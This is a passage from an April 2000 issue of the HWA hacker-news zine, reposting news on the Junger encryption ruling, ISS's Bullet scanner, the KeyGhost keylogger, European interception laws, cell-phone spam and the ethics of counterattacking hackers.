$25,000 damage, a figure based on the costs of
installing secure sites and the time lost to users while
the software was repaired.
The teen, who dropped out of school because he was
"too bored," is a self-taught computer whiz who said he
started using a computer when he was 2 years old.
"I understand what I did was wrong," he said. "I'm
hoping something good will come out of it."
@HWA
36.0 [HNN] Junger wins in Appeals Court-Code Declared Speech
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
Junger wins in Appeals Court - Code Declared Speech
contributed by Dan
The 6th Circuit Appeals Court has overturned a lower court ruling and
has concluded that the First Amendment does in fact protect computer
source code. Therefore they have remanded Peter Junger's case over
encryption exports back to the District Court for further
consideration.
6th Circuit Court Opinion
Associated Press - via World News
http://pacer.ca6.uscourts.gov/cgi-bin/getopn.pl?OPINION
http://www.worldnews.com/?action
BAD URL - expired or deleted. - Ed
@HWA
37.0 [HNN] Bullet to Scan Hard Drives of Web Site Visitors
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
Code-named Bullet and developed by ISS, this new s
oftware lets
e-commerce companies scan a Web site visitor's hard drive to see if it
is infected with Trojan horses, viruses or other malicious software
that could be passed on to the e-commerce site. Few details about the
program are available, the release date and pricing has not yet been
announced. (Are companies going to warn users before they scan them?)
CNN
http://www.cnn.com/2000/TECH/computing/04/06/scan.visitors.idg/index.html
Frisking computers at the door
From...
April 6, 2000
Web posted at: 8:53 a.m. EDT (1253 GMT)
by Ellen Messmer
(IDG) -- ISS has developed an intrusion-detection application, code-named
Bullet, that lets e-commerce companies scan a Web site visitor's PC to see
if it is infected with Trojan horses, such as Back Orifice, or viruses that
could be passed on to the e-commerce site.
Trojan horses let intruders seize remote control of PCs, and that could mean
a compromise of an online banking system, for example, even when the correct
user identification is employed to access the site.
"Businesses are just getting fed up with the crap coming off the Internet,"
says ISS CEO Thomas Noonan, adding that one bank is expected to announce it
is using the ISS application on its home banking site this week.
The ISS application uses ActiveX technology to scan the laptop, and if
required, wipe out the unwanted, dangerous code. Noonan acknowledges that
use of the scanning application could touch off an invasion-of-privacy debate.
Further details about the application were not available. ISS has not announced
when the application will become generally available or how much it will cost.
@HWA
38.0 [HNN] Links to Web Sites Illegal
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
The Osaka District Court has ruled that under certain conditions
linking one web site another would violate the law. While slightly
vague it would seem that simply linking to a site that violates the
law could be charged as aiding and abetting a crime.
Asia Biz Tech
http://www.nikkeibp.asiabiztech.com/wcs/leaf?CID
BAD URL - expired or deleted. - Ed
@HWA
39.0 [HNN] British Companies Complacent
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by acopalyse
A study by the Department of Trade and Industry in Britain finds that
British business are too complacent when it comes to online security.
The Information Security Breaches Survey 2000 (ISBS 2000) found that
60% of companies have suffered a security breach and that 30% do not
feel they have anything worth protecting. It was also found that the
average costs of each intrusion was only £20,000. The study will be
released at Infosecurity Europe 2000 on 11 April at Olympia in London.
The UK Register
http://www.theregister.co.uk/000406-000023.html
BAD URL - expired or deleted. - Ed
@HWA
40.0 [HNN] Trio Becomes First Internet Crime Conviction for Hong Kong
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by William Knowles
In the first case of its kind in Hong Kong a teenager has been
sentenced to six months in jail after pleading guilty to 49 computer
crime-related charges. Two other accomplices where sent to detention
centers. The trio got to know each other online where they traded name
and password information on various accounts. The three have been
released on bail pending an appeal.
Agence France-Presse - via Nando Times
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
http://www.techserver.com/noframes/story/0,2294,500189582-500255153-501302727-0,00.html
@HWA
41.0 [HNN] Census Afraid of Electronic Intrusion
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Evil Wench
While the US Census Bureau claims that it is doing everything it can
to increase responsiveness it has deliberately played down the online
option. The Census feels that they have not adequately tested the
security options of the site. So while the site is active and
available it is not being publicized. (It won't get broken into if we
don't tell anyone about it.)
Online Census Form
Industry Standard - via Yahoo
http://www.2000.census.gov/
http://dailynews.yahoo.com/h/is/20000406/bs/20000406103.html
@HWA
42.0 [HNN] Hardware Key Logger Introduced
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Weld Pond
Software to monitor every key stroke has been around for a while but
now a New Zealand company has introduced a hardware device that is
small enough to be hidden inside the keyboard that does the same
thing. The small device known as KeyGhost will monitor and record
every key stroke on the keyboard and stores all data within itself.
KeyGhost will retail for between $99 and $309.
ZD Net UK
http://www.zdnet.co.uk/news/2000/12/ns-14347.html
Tiny keyboard snooping device tracks passwords
Mon, 27 Mar 2000 11:06:12 GMT
Will Knight
Before you press the return button, check you're not bugged. Will Knight
reports.
A tiny device that can be hidden within a keyboard or a PS/2 plug and secretly
record half a million user keystrokes has been launched by New Zealand hardware
manufacturer, Working Technologies.
Unlike most surveillance technologies, 'Key Ghost' does not require any
software to be covertly installed. All data is stored directly on the device and
can be summoned by entering a "Personal Unlock Code" (PUC) through a keyboard.
The device can then be removed and the information retrieved by another computer.
The most obvious application of this technology is to capture usernames and
passwords or data that has been encrypted or otherwise protected on a machine.
Working Technologies also markets the add-on as a handy data recovery tool.
Working Technologies says the FBI uses similar technology to carry out computer
surveillance.
Key Ghost devices cost between $99 (£62) and $309 (£195).
@HWA
43.0 [HNN] Napalm Issue 4
~~~~~~~~~~~~~~~~~~~~
April 10th
contributed by Kynik
Issue 4 of Napalm has been released with articles on securing Solaris
2.x and musical intonation. (Now that's a weird mix.)
Napalm
http://napalm.firest0rm.org/
@HWA
44.0 [HNN] EU Set To Rewrite Human Rights
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by g.machine
Rules and treaties originally drawn up fifty years ago to outline
basic human rights failed to anticipate advancements in technology.
Now the European Union is attempting to rewrite those rules which
would included a ban on 'systematic interception' of electronic
communications. This would essentially ban Echelon and Frenchelon.
(Why do the Europeans seem to understand privacy so much better than
US lawmakers?)
Heise
http://www.heise.de/tp/english/inhalt/co/6724/1.html
Flaw In Human Rights Uncovered
Duncan Campbell 08.04.2000
Proposals for a new definition of human rights now before the European
Parliament would ban ECHELON and update data protection rules to latest
developments in telecommunications technology.
International spying on communications should be identified as a breach
of fundamental human rights, according to proposals now before the
European Parliament. The new proposals suggest that treaties and rules
on human rights drawn up 50 years ago or more failed to anticipate how,
in the Internet age, threats to personal privacy can easily cross
international boundaries.
According to the five page proposal, all future interceptions must
"have a legal basis, be in the public interest and be strictly limited
to the achievement of the intended objective".
"Any form of systematic interception cannot be regarded as consistent
with that principle, even if the intended aim is to fight against
international crime".
"Any Member State operating such a system should cease to use it".
If implemented internationally, the new extension of human rights would
outlaw the practice of signals intelligence (sigint), except when used
to fight crime or terrorism. Sigint systems are now used by many large
countries to spy on the diplomatic, commercial and personal communications
of allies as well as enemies. The proposals are likely to be particularly
bitterly fought by the British government, whose sigint agency GCHQ
co-operates with the US National Security Agency to run the world's
largest communications intelligence system, including ECHELON.
MEPs will be asked to endorse proposals intended to eliminate cross-border
spying between European nations as well as by nations outside the Union.
The plans follow two recent parliamentary discussions about international
communications surveillance, and in particular the US-run Echelon network,
which collects phone call, fax and data communications from satellite
communications links.
According to proposals prepared by Graham Watson, chairman of the EP
Committee on Citizens' Freedoms and Rights, Justice and Home Affairs,
the existing framework of human rights is defective. They "fall short
of what the citizens of Europe are entitled to expect, since they do
not protect them from interceptions carried out by a Member State of
which they are not nationals".
"European citizens, irrespective of their nationality, are guaranteed
fundamental rights at the highest possible level", Watson asserts.
If the resolution is passed by the full Parliament at a meeting in
Strasbourg later this month, the EU's president will be told that there
is an "urgent need" for the Council "to take ... necessary diplomatic
steps to prevent third countries from carrying out any form of
interception on the territory of the Union outside the framework of
the joint fight against organised crime". The President will be asked
to commence diplomatic negotiations with the United States and other
countries "to put an end to all forms of systematic and general
espionage by third countries vis-à-vis the activities of the Member
States of the Union, its institutions and its citizens".
It adds "even in the case of the fight against cross-border crime,
adequate safeguards governing interceptions should be drawn up" and
that "any form of interception by a Member State should be notified
to the Member States on whose territory the persons whose communications
are being intercepted are present".
The resolution also expresses irritation with "the current piecemeal
nature of the relevant laws and operational and organisational
arrangements" affecting interception in Europe. The "piecemeal
arrangements" include Schengen, Europol, and the Customs Convention.
According to Watson, these entail "different standards of protection"
and are "free of any real democratic and judicial scrutiny". Six of
15 EU states had also failed to comply with the EC directives on data
protection and on the privacy of telecommunications data.
The Committee also complains that the problems have been raised in the
"numerous written and oral questions tabled on this subject over the
last two years".
The proposals follow a two day hearing on data protection and
surveillance, held in Brussels in February, and statements made to
the Parliament by the EC and Council of Ministers at the end of March.
The Citizens Rights' Committee president is also presenting the lack
of formal international communications and data privacy as a global
problem. "On a world-wide scale, the rise of the information society
has not been accompanied by a corresponding revision of provisions on
data protection by the Council of Europe, the OECD and the WTO", he
says. The proposals call for UN guidelines on personal data and OECD
guidelines on privacy to be "given the status of binding texts - at
the very least between the States of the Union and their allies".
The new proposals do not include the appointment of a special
Committee of Enquiry by the European Parliament, a proposal put forward
last month by the Green Parties and their allies. Such a committee might
have been limited to looking at breaches of existing European community
law. Instead, Watson has asked that his and two other committees be asked
to prepare, by the end of the year a new and detailed report on the
problem of data protection and interceptions.
@HWA
45.0 [HNN] Dutch Want Their Own Echelon
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by root66
The Dutch Parliament is currently debating a bill that will give
increased powers to the Dutch Intelligence Agency BVD. If passed the
bill would allow the agency to intercept satellite communications at
random and search the intercepted traffic by keywords.
Heise
http://www.heise.de/tp/english/inhalt/co/6731/1.html
Echelon in Holland
Jelle van Buuren 11.04.2000 Dutch intelligence agency authorized to scan
satellite communications
The Dutch Intelligence Agency BVD is getting new powers. Among other
things, the powers to intercept communications will be extended. The
agency is authorized, if the government gets its way, to intercept
satellite communications at random and search the intercepted traffic by
keywords. Also, the BVD gets a new intelligence task: the gathering of
economical information. Holland goes Echelon, it seems.
The new 'Act on the intelligence and security agencies' (WIV), which is
currently debated by Dutch parliament, gives the powers of the BVD a new
legal basis. Actually, it means mainly the extension of investigative
powers. In each amendment on the original proposal, new powers are given.
For instance, in the first draft of the new Act, the BVD got the power to
intercept, record and listen into telecommunications. In the latest
amendment, from the beginning of this year, the power to 'receive'
telecommunications was added. This means the BVD is authorized to directly
pluck telecommunications, for instance GSM-traffic, out of the air. In
this way, the BVD is no longer dependent on the willingness of telcom
operators to intercept traffic, but can create for instance their own
parallel network of receivers to intercept all GSM-traffic. Also, this
prevents providers from 'leaking' about the fine work the BVD is doing in
this area.
The biggest extension, however, is the newly added article 25a. In this
article, the BVD is authorized to intercept at random all international
telecommunication that is not cable bound and scan the intercepted
communication on items of interest (persons, groups, keywords). According
to the explanatory note by the draft Act, this kind of random interception
is needed to investigate if by any chance interesting messages are part of
the international communication.
The government says nonchalantly that it can't be prevented that in this
manner the BVD gets acquainted with the content of the intercepted
communications, although that isn't - still according to the Dutch
government - the main purpose of the random interception.
"The searching is primarily an instrument for the reconnaisance of the
communication, to try to establish the nature of the communication and
the identity of the person or organisation that is communicating. That in
this way the agency gets acquainted with a part of the content of the
communication is inevitable, in order to establish who is communicating
and if it's a person or a group that has the interest of the agency. The
searching however is not directed to get acquainted with the full content
of the communication. In a certain way, this activity is comparable with
the listening in on telephone conversations, to check if the connection
is allright."
This seems like a very creative way of saying that interception isn't
really interception, but a mere technical testing of connections. And for
that, no legal or governemental warrant is needed...
Keywords
As important parts of the international telecommunications are transmitted
by satellites and beam transmitters, it is clear this article 25a
authorises the Dutch BVD to intercept all these communications. This means
an uncontrolled authority to intercept and scan all communication that is
not cable bound. This can have a great impact on the Internet traffic. As
a message on the Internet chooses the least busy route, and the heart of
Internet lays in the United States, there is a big chance that email send
within the Netherlands chooses an international route by satellite. In
future this can also be the case for telephone conversations. All these
messages can be intercepted and randomly searched. Even now, the phone
conservations between two big Dutch cities, Amsterdam and Rotterdam, are
being transmitted by beam transmitters.
In the first draft of the WIV, the Home secretary had to give permission
to the keywords the intelligence agency is using to scan the intercepted
traffic. In the latest amendment, the Home secretary only gets once a year
notification of the list of keywords, whereas the BVD is authorized to add
new keywords to its own discretion.
Besides that, the BVD is authorized to store all intercepted
communication. Where the first proposal of the Act stipulated that the BVD
has to destroy immediately all intercepted communication that isn't of
interest for them, the new amendment gives the BVD the right to store all
intercepted communication for a year.
In this way, the Dutch government is creating its own mini-Echelon. The
BVD uses for its interception tasks the facilities of the Technical
information processing centre (TIVC) of the Navy intelligence. This
centre, located at the Navy complex Kattenburg in Amsterdam, decodes
satellite traffic that is being intercepted by different ground stations.
The TIVC is working the same way as its big brother NSA, as showed by the
publication of internal documents in the Dutch daily De Haagse Courant in
1985. Satellite conversations were intercepted, recorded and selected by
keywords for further analysis. The intelligence the TIVC gathered was sent
to the Foreign Intelligence Service (IDB), till this unit was closed down
in 1994 after a serie of scandals. Since than, all signal intelligence is
in the hands of Navy intelligence.
According to a study of two Dutch Intelligence experts (Bob de Graaff and
Cees Wiebes, Villa Maarheeze, 1998), the TIVC is part of a broader
international network and works closely with other Western agencies. For
instance in 1972, the TIVC reported to the Mossad that Egypt and Libya had
developed a telephone- and telex-connection under sea. Israelian special
forces destroyed this connection, so Egypt and Libya had to communicate
again by satellites, which were an easy target for interception. According
to the authors, the American CIA protested in 1992 firmly against the
immanent dissolution of the IDB, because they were afraid Dutch signal
intelligence capacity would diminish.
Vital economic interests
The new power to intercept satellite communications at random will
undoubtfully be used for economic espionage. In the past, the signal
intelligence capacity already served economic purposes. In the above
mentioned study of the intelligence experts, examples of this are
mentioned. The authors speak of an "incestious relation" between the
intelligence services and Dutch industry. Leading persons of big dutch
companies, with establishments abroad, worked for the IDB. In exchange,
they got economic intelligence gathered by the TIVC. The Dutch
multinational Philips has, according to the study, close relations with
Dutch intelligence. The company installed interception devices in
telephone centres it sold to foreign companies and governments, the report
says.
In the proposed new 'Act on the intelligence and security services', the
BVD gets officially the task of economic intelligence gathering. The BVD
has to "protect vital economic interests", which is seen as a part of the
national security.
"The Dutch economy is highly dependent of economic developments in the
world; these developments are characterised by increasing
internationalisation and globalisation. Decisions taken elsewhere, can
have a sincere impact on the Dutch economy. It is possible to gather
intelligence on these developments in different ways, for instance by
cooperation with intelligence agencies of other countries. These agencies
however, wil take in account their own interests. In order not to be
dependent of information of third parties, the government thinks it is
necessary to build up its own information position and enforce it."
What excactly 'vital economic interests' are, is however wrapped in a
cloud of mystery.
"To end with, we remark that with the explicitation of 'vital economic
interests of the Netherlands' in the terms of reference of the BVD, also
the possibility is created - if it seems appropriate - to conduct
investigations in this area, where national security as such isn't in
danger or is difficult to argue for."
Encryption
The new powers of the BVD are also interesting because some articles are
related to cryptography and information technology. The BVD is authorized
to break into homes and offices to bug keyboards. Besides that, the BVD is
authorized to break into computers and steal, alter or delete information
that is stored in computers. In other words, the BVD is allowed to hack.
In this way, the intelligence agency can steal data from computers,
manipulate software, corrupt passwords or install a Trojan Horse, so
access is secured and cryptography can be bypassed.
Cryptography is a topic of special interest for the BVD. In the draft Act,
the power to undo encryption is being extended. In the first proposal the
BVD got the authority to decrypt encrypted communication and data "by
technical means". In the latest amendment this is extended to decryption
"by all possible means". According to the explanatory note, "practice has
shown there are other ways than just technical means to decrypt encrypted
communications."
This cryptic description seems to be directed at infiltrators who diddle
out passwords, or look over the shoulder when messages are encrypted, or
intelligence teams breaking into homes and offices in search of the little
piece of paper the password is written on.
The articles on the interception of telecommunication also contain remarks
on cryptography. Encrypted messages may be kept in storage as long as is
necessary for the BVD to decrypt them. The explanatory note says:
"Where telecommunication is concerned, of which the encryption is not
undone, and where the mere fact that cryptography has been used makes
this communication interesting for the agency, it is desirable to save
this communication to the moment the capacity exists or is being
developed to decrypt the communication."
So the use of a perfectly normal technique to protect ones privacy, trade
secrets or sensitive political information, is in the eyes of the Dutch
government a highly suspected act.
The draft Act also introduces the obligation for "every one" the
authorities believes has acces to the keys, to cooperate with the
intelligence agency in decrypting the encryption. Refusal is punishable
with a sentence of two years. The Dutch parliament has asked the
government if this means that suspects also are obliged to hand over the
keys.
The answer is not available yet. But if the governement confirms this
obligation also applies to suspects, this will be a clear violation of the
fundamental human rights, as stated for instance in the Treaty on the
protection of the Human Rights and Fundamental Freedoms. It means an
obligation to cooperate on your own condemniation and the reversal of the
burden of proof.
@HWA
46.0 [HNN] SPAM Goes Wireless
~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Unsolicited commercial email is finding new ways of interrupting our
lives with their unwanted and unwelcome messages. Companies are now
using wireless messaging services to page people with advertisements
for their products. the company responsible for the SPAM, plugout.com,
said that it was only a one time occurrence and will never happen
again. (That's one time too many, if everyone did it one time...)
Washington Post
http://www.washingtonpost.com/wp-dyn/business/A51301-2000Apr10.html
'Spammers' New Calling: Cell Phones
By Mike Musgrove Washington Post Staff Writer Tuesday, April 11, 2000;
Page E01
Mike Malarkey, a business-development manager for the District-based
educational Web developer Blackboard Inc., was in the middle of a meeting
last Thursday when his Nokia cell phone chirped, sounding a bit like the
low-battery warning.
When he checked it after the meeting, he saw that the battery was fine,
but he'd just received a text message on the phone's screen--an
advertisement for a Web site selling cell-phone accessories.
"I'm just surprised that it's progressed to phones," said Malarkey. He was
one of the first recipients of an apparently novel kind of unsolicited
electronic advertising, or "spam," sent via the text-messaging service on
his ATT Wireless phone.
Another ATT customer, Laurie Ann Ryan, a public relations director who
asked that her firm not be identified, was infuriated to receive the same
message last Thursday: "Clearly the sender knows it's going to interrupt
somebody's day." She called the ad "excessively aggressive and invasive"
because a cell phone is something users tend to carry with them all
day--unlike the personal computers that e-mail spammers have targeted for
years.
One veteran of the long-running fight against spammers said this abuse of
ATT's system should come as no surprise. "I expect to see more of it
unless this kind of thing is controlled," said Nick Nicholas, an
"evangelist" at the Mail Abuse Prevention System, an organization that
tries to get Internet providers to cut off spammers' access.
Nicholas noted ATT Wireless's configuration of its text-message system as
a possible vulnerability: Its customers automatically get an e-mail
address consisting of their phone number followed by "@mobile.att.net."
"Because of the way ATT sets up the e-mail account, all you need to do is
just try consecutive numbers," he said. Nicholas said ATT should have been
able to detect this "war dialing" approach and block the spammers' access.
ATT spokeswoman Alexa Graf hadn't heard of Plugout.com's unsolicited
transmission until a reporter called yesterday afternoon. "The last thing
we want to do is start spamming our customers," she said.
The text messaging service is an included feature with ATT's service;
customers are not billed for incoming text messages. Sprint PCS offers a
similar service, while Verizon Wireless (formerly Bell Atlantic Mobile),
Nextel and Cellular One charge extra for the ability to receive text
alerts.
A spokesman for Sprint PCS reported no spamming incidents and said, "We
have software that can detect a spam and is designed to prevent it from
happening."
The company behind the ad, Plugout.com, is a Fort Lee, N.J.-based
operation whose site has only been fully operational since February.
Rudy Temiz, the company's 22-year-old president, said yesterday afternoon
that he didn't plan to repeat the exercise but expressed no remorse
either, saying that the marketing technique had generated "quite a few"
sales.
"One of the reasons we're doing this," said Temiz, "is because every
single dot-com company isn't graced with venture capital and all us
smaller Web sites have to find more creative ways to get on the map." He
didn't reveal how many messages had been sent out or how he had obtained
his list of phone numbers but said, "We're only doing it one time. Nobody
in Washington, D.C., should ever hear from us again."
Nicholas, the anti-spammer, called Temiz's marketing, "more ignorance than
anything, ignorance of the economics of the Internet or of the culture of
the Internet."
Vincent Zahn, Plugout.com's director of strategy, further defended the
text ads. "What better way to reach your target market?" he asked, saying,
"We look at it as if we're doing these people a favor if they're looking
for these kinds of products."
Responded ATT customer Ryan, "They're not doing me any favors by
soliciting me over my cell phone."
© 2000 The Washington Post Company
@HWA
47.0 [HNN] Forget Fort Knox Now It's Fort Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Code Kid
RedWood City California based Equinix has just opened its bomb proof
Net shelter. The shelter is said to be more secure than Fort Knox to
protect the servers of third party companies housed inside. The
compound includes geometric hand-scanners, automated mantrap and other
fancy security devices. Equinix has already built two such shelters on
the East Coast and plans on 26 more throughout the county. (While
Equinix may have the physical security they do not provide any
Internet security. Doh!)
Wired
Reuters - via Yahoo
Equinix
http://www.wired.com/news/technology/0,1282,35550,00.html
http://dailynews.yahoo.com/h/nm/20000411/wr/tech_security_1.html
http://www.equinix.com
Wired:
Net Fort Opens to Mixed Reviews
by Lynn Burke 3:00 a.m. Apr. 12, 2000 PDT SAN JOSE, California -- The
opening of the new bomb-proof Internet shelter here Tuesday was a bit like
a Mafia wedding that couldn't decide whether it wanted to be top-secret or
front-page news. In the end, it ended up being neither.
The shelter, operated by Redwood City, California-based Equinix, is billed
by its owners as a Fort Knox-like bunker that will protect the very
infrastructure of the companies fueling the electronic economy of the
United States.
Unfortunately for Equinix, the San Francisco Chronicle plastered the
top-secret location of the facility on its front page Tuesday morning. But
even if the unmarked shelter is no longer such a secret, the sprawling
compound -- chock-full of fancy security devices including geometric
hand-scanners and automated mantraps -- does appear capable of protecting
the computers housed inside from physical attack.
But is the Internet under threat of such assault? Former National Security
Advisor Mike McConnell sure thinks so.
"Look at the World Trade Center bombing," he said. "The purpose of that
attack was to collapse Wall Street. If I'm the blind sheik (accused in the
attack), I say, 'Well, that didn't work.'"
Going after the bank is no longer a worthwhile strategy, he said. Now you
go after the bank's computers.
"If you're measuring e-commerce in billions and trillions," he said, "what
Equinix has provided here, in my view, is an absolute must."
Benchmark Capital analyst Andy Rachleff, whose company helped to pony up a
good chunk of the $80 million secured for second-round financing, says
Equinix has hopped in front of a security trend in e-business.
"This is monstrous," he said. "If you're going to put your business on the
Internet, you're going to put your servers in a facility like this."
The building, a renovated version of a former IBM facility, was rebuilt by
Bechtel Corporation, the brawn behind the Hong Kong International Airport
and Boston's Ted Williams Tunnel. Bechtel has entered into a $1.2 billion
contract to build 26 more of these hosting facilities. The company has
already built two on the East Coast -- in Virginia and New Jersey.
Jeff Thompson, a software developer for operating systems security
platforms provider Argus Systems, says sinking a bunch of capital into
this kind of facility is crazy.
The security industry isn't focused on external threats, he says.
"It's so much easier to break in over the public network," he said. "The
real problem is how easy it is to attack a system on a public network."
Indeed, the denial-of-service attacks earlier this year on several of the
Internet's biggest players were all electronically perpetrated over the
Internet itself. And Equinix officials say their facility won't prevent
those kinds of attacks.
"That's something our customers need to work out themselves," said vice
president of sales Peter Ferris.
There's little doubt that the industry is worried about security, physical
or otherwise.
According to a recent survey of Fortune 1000 corporate security
professionals by security corporation Pinkerton, the potential threat to
Internet sites and computer networks was identified as the industry's
second-biggest security concern.
A recent survey from the Computer Security Institute and the San Francisco
Federal Bureau of Investigation's Computer Intrusion Squad found that 90
percent of respondents -- primarily large corporations and government
agencies -- detected computer security breaches within the last 12 months.
While no one knows whether a campaign of terror against the Internet is in
the works or not, it may just be that a facility like Equinix's provides a
little extra measure of comfort in an industry that is defined by
volatility.
Bobby Robertson, a business developer with broadband provider Enron, said
Equinix has taken security to a whole new level, and has come up with the
most sophisticated hosting service he's ever seen.
"It's reassuring, for sure," he said. "I think security is very important,
and this is a very thoughtful approach."
Yahoo:
SORRY!
Url expired (see how badly we need news gatherers!!!!? - email me if you
want to help collecting articles! tnx cruciphux@dok.org - Ed)
@HWA
48.0 [HNN] TrustedBSD Announced
~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by tricky deamon
It seems the BSD family has a new member, TrustedBSD. TrustedBSD
provides a set of trusted operating system extensions to the FreeBSD
operating system, targeting the Orange Book B1 evaluation criteria.
TrustedBSD
http://www.trustedbsd.org/
@HWA
49.0 [HNN] 690,000 Illegal Web Pages on the Net
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Speaking in Sydney Australia last week, the president of the Business
Software Alliance, Mr Robert Holleyman, said there were at least
690,000 warez, appz and crackz Web pages on the Internet. (690,000?
Who went around and counted them all? By the time they finished half
of them were probably down.)
Sydney Morning Herald
http://www.smh.com.au/news/0004/11/text/bizcom04.html
Pirates display their booty on the isle of Zed
Date: 11/04/00
By PETER GOTTING
If you thought X-rated was bad, just wait till you see the Zs.
On the dark side of the Internet, the letter Z is used to pluralise almost
anything that is illegal.
Thus, warez, appz or filez refer to pirated software, computer games,
music and film downloads; serialz are software serial numbers and
passwordz are passwords that allow free entry to subscription-based
pornography sites.
For years, Internet users have swapped warez online. Those in the know can
easily find a free copy of applications such as Windows 2000, Adobe
Photoshop and Corel Draw; computer games such as Quake 3, KingPin and
Soldier of Fortune; and even movies such as Scream 3, Star Wars and Green
Mile. On a serialz page you can retrieve serial numbers for anything from
first aid computer programs to multimedia software.
And throughout the sitez are banners advertising pornography and links to
pages listing passwords to XXX material.
"The best illegal downloads" one site advertises; "Illegal MP3 arena"
another calls itself; "100% Illegal Pirated O-Day" one boasts.
The sites are nothing new, but copyright owners are getting scared. With
technological developments set to make it much easier to break the law -
broadband will reduce download times dramatically - software companies are
concerned.
Speaking in Sydney last week, the president of the Business Software
Alliance, Mr Robert Holleyman, said there were at least 690,000 warez,
appz and crackz Web pages on the Internet.
The Business Software Alliance - an international industry body
representing software companies such as Microsoft, Lotus, Adobe, Novell
and Symantec - estimates Internet piracy now involves more than $US1
billion ($1.67 billion) worth of software worldwide.
Mr Jim Macnamara, chairman of the alliance's local counterpart, the
Business Software Association of Australia, said technological
developments such as broadband and faster modems would aggravate the
problem.
"It's all necessary for the e-commerce revolution to happen," Mr Macnamara
said. "But, equally, we are concerned because illegal software will be
easier to access."
The sites are not hidden but quite blatant, Mr Macnamara said.
"They are quite unashamed. They do not do anything else. They openly boast
of what they have got on them."
A disclaimer on one site warns: "If you are affiliated with any
government, anti-piracy group or any other related group, or were formerly
a worker of one, you CANNOT enter this Web site, cannot access any of its
files and you cannot view any of the HTML files."
The sites say that threats against Internet service providers or
prosecutions of people affiliated with the page would breach the US
Internet Privacy Act.
Mr Macnamara suggested Internet service providers should be required to
compile contact details of Web sites owners which would be available to
police but not the public.
"Individual privacy should be protected but the hosts of sites should be
required to keep a record of who owns that site," he said.
"If you get a court order you should be able to locate who is doing that
and press charges.
"Often we do not even know where they are because there's no records
kept."
But the organiser of hackers group 2600 Australia, Mr Grant Bayley, said
most of the sites were hosted on free Web page hosting sites such as
Geocities and Angelfire, rather than through ISPs.
"A change in law won't achieve any of their objectives," he said.
Mr Bayley said 2600 did not condone any of the sites. Hackers were
interested in computer security and not breaking the law; crackers access
software illegally.
"The number of sites alleged to exist seems grossly exaggerated," he said.
But Mr Bayley suggested software companies should provide more programs to
consumers on a free trial basis.
"It's a problem of not offering enough of a sample," he said.
"People operating such sites are often under the age of 18 and do so more
out of interest in a product than a desire for professional gain. These
are people wanting to try out the software."
This material is subject to copyright and any unauthorised use, copying or
mirroring is prohibited.
(We disregard all such notices, news is in the public domain, we don't
charge for access to these archives, if anything we're doing the site(s)
a favour by disseminating their news. Legal action will result in a civil
disobedience action and will incur underground continuance of our zine.
- Ed)
@HWA
50.0 [HNN] Attacking the Attackers
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
April 12th
contributed by Evil Wench
Just how legal is it to launch a counterattack against an online
attacker? Would you be committing just as big a crime as they are? How
can you be sure you are counterattacking the correct target? Should
laws be passed to legalize hostile responses?
CNN
http://www.cnn.com/2000/TECH/computing/04/07/self-defense.idg/index.html
Can you counter-attack hackers?
From...
April 7, 2000 Web posted at: 10:17 a.m. EDT (1417 GMT)
by Winn Schwartau
(IDG) -- You are running a Web site. Making money perhaps, and visitors
are seeing your message. Then, according to your perimeter
intrusion-detection device, some online goofball or criminal hacker is
beating on your door. What are you going to do?
In September 1998, the Pentagon reacted to a browser-based
denial-of-service attack by the hactivists Electronic Disruption Theater
by using offensive applets to shut down the attacking browsers. Clean.
Quick. Effective. But the Pentagon lawyers went ballistic within minutes.
The techies defending the Pentagon servers had broken too many laws to
enumerate - including a military prime directive, "posse comitatus," which
forbids the military from taking unilateral actions within the U.S. and
against U.S. citizens.
In addition, the techies by their actions had committed several federal
felonies for which hackers have gone to jail.
The simple truth is that it is illegal to disarm your online assailant.
Doing so requires that you take some offensive action - send out hostile
applets, return fire with your own denial-of-service tools or anything
else that will shut down the attack. The net effect is that both the
attacker and the victim (who is attacking back) are breaking the law.
At first glance, it doesn't make any sense: If you can disarm a
knife-wielding mugger, why can't you disarm your electronic mugger? But in
the physical world, you know who is mugging you. During the physical
attack there is a person with a knife, and while you may not know his name
or see his face, you are 100% sure that the knife you are taking away is
in the hands of a bad guy.
In the networked world, though, you cannot be sure the guy (IP address)
that seems to be attacking you is really the one attacking you. For
example, many of the zombie-based, distributed denial-ofservice attacks
that occurred in February were traced back to benign networks which were
merely unwitting hosts to remote-triggered Trojans located on their
servers.
Hostile perimeter defense is a really tough problem, and right now the law
protects the bad guys more than the good guys. I don't have a perfect
solution to this conundrum, but a few thoughts do come to mind:
Let the industry design a set of hostile response tools that will stop an
attack, but minimize harm just in case a zombie is in the middle. Then,
legalize the use of these tools.
Legalize hostile responses, and zombie computers be damned if their
security is so bad that their networks can be compromised. Build a
hardened back-channel on the Internet which will provide fast routing so
that trace-back and bad-guy ID is easier, faster, and with the cooperation
of the ISP community, automatic.
Develop an Internet-based Caller ID system so that Web sites know who's
there, what they're doing and can ignore all anonymous requests.
Do nothing: Let the bad guys continue to win.
So in the spirit of the networked community, I'm asking readers to help
out: What do you think is a fair and efficient way of disarming online
assailants to protect your net?
Be creative, let loose; write laws or design technology. And send me your
ideas. Maybe together we can get something done.
@HWA
51.0 [HNN] More EZines Released
